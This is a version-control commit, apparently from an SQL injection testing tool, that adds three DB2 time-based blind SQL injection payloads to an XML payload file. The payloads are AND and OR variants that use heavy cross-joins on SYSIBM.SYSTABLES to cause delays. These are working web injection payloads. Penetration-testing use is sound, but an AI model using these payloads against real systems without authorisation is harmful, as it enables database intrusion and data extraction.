adding payloads for time-based injection on DB2 (heavy query)

2024-11-22 17:46:37 +03:00 · 2011-06-26 16:38:22 +00:00 · 2011-06-26 16:38:22 +00:00 · d0490cc4e7
commit d0490cc4e7
parent 36c96ef796
1 changed files with 58 additions and 0 deletions
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@ -2195,6 +2195,45 @@ Formats:
            <dbms_version>&gt;= 2.0</dbms_version>
        </details>
    </test>
+
+    <test>
+        <title>DB2 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>DB2 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>DB2</dbms>
+        </details>
+    </test>
    <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
    <!-- End of AND time-based blind tests -->

@ -2376,6 +2415,25 @@ Formats:
            <dbms_version>&gt;= 2.0</dbms_version>
        </details>
    </test>
+
+    <test>
+        <title>DB2 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>DB2</dbms>
+        </details>
+    </test>
    <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
    <!-- End of OR time-based blind tests -->